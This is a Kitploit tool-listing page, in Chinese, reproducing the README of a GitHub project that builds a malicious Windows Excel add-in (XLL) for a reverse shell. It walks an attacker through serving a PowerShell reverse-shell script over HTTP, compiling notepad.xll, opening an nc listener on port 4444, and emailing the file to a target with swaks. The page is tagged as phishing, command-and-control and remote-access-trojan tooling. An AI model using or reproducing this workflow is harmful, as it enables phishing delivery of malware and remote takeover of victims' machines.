Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
xll_windows_reverse_shell — xll windows reverse shell | Kitploit
工具/GitHubGitHub/h3x0v3rl0rd/xll_windows_reverse_shell
Phishing ToolsExploitationCommand and ControlSocial EngineeringRed TeamingPayload DevelopmentRemote Access Trojan
GitHubh3x0v3rl0rd/xll_windows_reverse_shell

xll_windows_reverse_shell

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

xll windows reverse shell

查看仓库
11年前尚未审核

xll_windows_reverse_shell

xll Windows 反向 Shell

在你的攻击者(Kali)机器上:

root@kitploit:~
git clone https://github.com/n3rdh4x0r/xll_windows_reverse_shell.git
  1. 更新 revsh.ps1
  2. 创建 Python HTTP 服务器
root@kitploit:~
python3 -m http.server 9999

在你的攻击者(Windows)机器上:

  1. 将 notpadXLL.c 移动到你的 Windows 攻击者机器上,并相应地更新 notpadXLL.c。
  2. 打开 x64 Native Tools Command Prompt for VS 2022
  3. 运行以下命令以生成 notepad.xll
root@kitploit:~
cl.exe /LD notepadXLL.c /link /out:notepad.xll

image

  1. 将 notepad.xll 移动到你的 Kali 机器上

在你的 Kali 机器上

  1. 下载 swaks
root@kitploit:~
 curl -O https://jetmore.org/john/code/swaks/files/swaks-20240103.0/swaks
  1. 配置 nc 监听器
root@kitploit:~
nc -nlvp 4444
  1. 使用 swaks 发送一封附带 notepad.xll 的电子邮件:
root@kitploit:~
./swaks --to [email protected] --from [email protected] --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @notepad.xll

image

下载工具